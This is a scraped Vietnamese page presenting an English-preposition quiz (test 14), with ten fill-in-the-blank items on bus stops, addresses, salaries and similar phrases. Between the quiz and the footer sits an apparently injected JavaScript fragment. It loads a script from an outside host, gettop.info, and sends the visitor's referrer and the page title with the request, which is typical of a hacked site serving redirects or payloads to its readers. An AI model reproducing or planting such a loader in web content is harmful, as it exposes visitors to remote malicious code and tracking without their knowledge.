Home / Trắc nghiệm giới từ tiếng Anh / Test 14 – Trắc nghiệm giới từ tiếng Anh

Test 14 – Trắc nghiệm giới từ tiếng Anh

place1

Trong tiếng Anh, giới từ luôn là một chủ đề mà sẵn sàng làm đau đầu bất cứ một người học tiếng Anh nào, từ trình độ cơ bản cho đến nâng cao bởi sự đa dạng trong cách dùng và các quy tắc chẳng giống ai của giới từ. Nói dễ cũng đúng, mà nói là khó thì cũng không sai. Để dùng thành thạo giới từ, đòi hỏi mỗi người phải nắm rõ những nguyên tắc cơ bản, sau đó đọc và làm bài tập thật nhiều. Hãy dành một tình cảm đặc biệt cho nó, đến một lúc nào đó, bạn sẽ nhận ra: Giới từ thật thú vị!  


1.We always get _________ the bus at the same stop
2.My aunt lives ________ 105 Beijing Road
3.She painted the picture _________ water-colours
4.I believed _________ that she would come
5.I`m going to dig it up
What _________?
6.How many people are there _________ your basketball team?
7.You will get $ 50 _________ and ________ your usual salary
8.We are thankful _________ him _________ his help
9.The thing I don’t like about my present job is that we often have to work up to ten hours _______ a stretch.
10.When getting on the bed, you had better take ……………………….. your shoes.


s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Cập nhật các bài viết của chúng tôi trên Facebook: